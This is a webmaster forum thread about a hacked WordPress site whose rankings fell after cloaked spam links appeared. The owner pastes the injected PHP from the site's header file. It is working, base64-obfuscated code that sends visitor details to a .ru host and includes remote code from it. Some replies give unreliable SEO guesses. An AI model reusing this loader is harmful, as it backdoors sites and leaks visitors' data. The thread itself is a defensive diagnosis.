I've been wondering why my site was recieving such low traffic the past few days, then I realised the other day from the look of my Yahoo Cache. I noticed that my navigation bar had been hijacked and a load of spam links had been placed in there. Since then my site which was ranking in the top three for several keywords is now nowhere to be seen. On top of that, I just noticed that I had lost my rank for several keywords on Google too. I then did a search for my site and found every page apart from the home page? I tried to view my cache but it doesn't exist anymore. Has my site been banned from Google? If so, what can I do about it? It was bad enough losing my rank in Yahoo, but now Google too? I've put so much time and money into the site and I've gone from ranking 1 - 3 for some popular search terms to recieving 50 hits a day
your site is not banned . there are indexed pages http://72.14.209.104/search?hl=tr&q=site:http://www.tupac-amaru.com/&btnG=Ara&lr=
It seem like a penalty to me , remove them and Imo it won't take time to recover (it may take a month)
I can't remove them because they're not actually on the site. The reason I didn't take any action when I saw my Yahoo cahce it because the links are not currently on my site, and so I assumed it must have been a temporary thing whilst I was asleep that was fixed before I saw it. But my Yahoo cache is still showing the same links, and now I'm guessing Google has spidered the site and seen them, but the links aren't visible to us?? And trichnosis, I see my sub pages are indexed, but not the actual index page (www.tupac-amaru.com).
abstroose, i know this might sound a tad basic, but have you tried logging in to your webmaster tools account and confirm that you don't have any penalty warnings attributed to that specific domain?
check your index page and if exist your login page for a code beginning with "iframe" , there are some worms like this.It can be anywhere on the code.
It appears the webpage was hacked or something. I didn't think anything was wrong with it now because I searched through the source of the page and couldn't see anything wrong. But I just went into the header PHP file itself and found this: <li><a href="<?php bloginfo('url'); error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>" class="active">Tupac | 2Pac | Makaveli | Tupac Shrine</a></li> Code (markup): I think it displays the spam links when it identifies the Search Engine Spider user agent, and just displays the normal page to visitors. I'm going to have to look into it and find out more.
I am not a coder , you can check it with back-up copies of your page , I have had a problem with the iframe one and it infects all of the sites on the same server.
If not banned you have got some of the filters activated for sure. Report this to google with screen shots, and tell them that the problem has been corrected now. Same happened with link building expert Andy Hagans but his site came up back again with a bang and regained its rankings.
Nothing is wrong with your site. NOTHING. Google's updating its indexes. Your site is absolutely fine. Google's dancing and hence we all are. Some way to get us ladies eh ? LOL.
Your site not banned and stops that activity with filter or something like that also think for another possible reason...
